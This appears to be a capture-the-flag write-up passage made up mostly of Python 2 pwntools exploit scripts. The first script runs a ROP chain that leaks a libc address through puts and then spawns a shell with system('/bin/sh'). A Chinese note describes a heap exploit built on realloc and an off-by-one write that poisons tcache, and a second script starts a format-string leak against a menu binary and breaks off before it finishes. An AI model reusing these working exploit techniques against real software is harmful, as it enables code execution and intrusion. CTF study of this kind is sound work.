# Exploit script for ./pwn_printf, as reproduced in the writeup. It targets
# Python 2 + pwntools: `print hex(...)` and `.next()` are Python 2 forms and
# `p.recv(6) + '\x00\x00'` relies on Python 2 byte-strings.
from pwn import *
p = process("./pwn_printf")
libc = ELF("./pwn_printf").libc  # pwntools resolves the libc the binary links against
p.recvuntil("You will find this game very interesting\n")
#gdb.attach(p,'b *0x4007DF')
# Sixteen inputs of 0x20 are sent before the payload; what the target does
# with them depends on its input loop, which is not visible here — TODO confirm.
for i in range(16):
    p.sendline(str(0x20))
# Absolute addresses inside the executable image. Hard-coding them only works
# when the binary is mapped at a fixed base (i.e. built without PIE); a PIE
# build would invalidate all three constants.
puts_plt = 0x400640
puts_got = 0x603018
pop_rdi = 0x0000000000401213
# Stage 1: a return-oriented chain that calls puts(puts_got) — printing the
# GOT entry of puts — and then returns to 0x4007DF. The leading qword
# (0x603500) sits before the first gadget; its role (a saved-frame slot?) is
# not determinable from this excerpt. The leak is needed because libc's load
# address is randomized by ASLR.
p.send(p64(0x603500)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x4007DF))
# puts stops at the first NUL, so a user-space x86-64 pointer arrives as 6
# bytes; pad to 8 and subtract puts' offset to recover the libc base.
libc_base = u64(p.recv(6)+'\x00\x00') - libc.sym['puts']
print hex(libc_base)
#p.send("a"*0x8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x4007C6))
# Stage 2: the same chain shape, now calling system("/bin/sh") from libc
# (classic ret2libc). Mitigation note: if the corrupted return address lives
# on the stack (the "a"*0x8 padding suggests a frame slot — unconfirmed), a
# stack protector or hardware shadow stack would break this stage; from the
# monitoring side, a service process spawning /bin/sh is the observable event.
p.sendline("a"*0x8+p64(pop_rdi)+p64(libc_base+libc.search("/bin/sh").next())+p64(libc_base+libc.sym['system']))
p.interactive()
only_add
只有add功能,但是用的是realloc函数,size为0时即为free。
另外输入的时候可以off by one,修改size位可在下次申请到的时候溢出该堆块。
首先构造出unsortbin,并且利用off by one漏洞溢出修改其fd为_IO_2_1_stdout_,然后继续改另一tcache堆块fd到这里。
# Exploit script for ./blend_pwn, as reproduced in the writeup. Python 2 +
# pwntools style. The script continues beyond this excerpt: the `one` offsets
# below are defined but not used in the visible part.
from pwn import *
p = process("./blend_pwn")
libc = ELF("./blend_pwn").libc  # pwntools resolves the libc the binary links against

# Menu helpers. Each waits for the main prompt, selects an option by number,
# then answers the option's own prompt where there is one. All of them write
# to the module-level `p`.

def add(data):
    """Option 2: send `data` as a note (newline-terminated)."""
    p.recvuntil("Enter your choice >")
    p.sendline("2")
    p.recvuntil("input note:")
    p.sendline(data)

def free(idx):
    """Option 3: submit index `idx` (sent as a decimal string)."""
    p.recvuntil("Enter your choice >")
    p.sendline("3")
    p.recvuntil("index>")
    p.sendline(str(idx))

def show():
    """Option 4 (named "show" by the author); any output is left for the caller to read."""
    p.recvuntil("Enter your choice >")
    p.sendline("4")

def show_name():
    """Option 1 (named "show_name" by the author); output is left for the caller."""
    p.recvuntil("Enter your choice >")
    p.sendline("1")

def backdoor(data):
    """Option 666: send `data` raw (no trailing newline) after the prompt."""
    p.recvuntil("Enter your choice >")
    p.sendline("666")
    p.recvuntil("Please input what you want:")
    p.send(data)

# Four libc offsets — presumably one_gadget candidates for this libc build;
# not used within this excerpt, so which one applies cannot be confirmed here.
one = [0x45226,0x4527a,0xf0364,0xf1207]
p.recvuntil("Please enter a name: ")
# The "name" is a printf positional directive. If the program passes the name
# to printf as the format string, this prints the second variadic argument —
# a format-string weakness. Non-literal format strings are exactly what
# `-Wformat-security` diagnoses at compile time.
p.sendline("%2$p")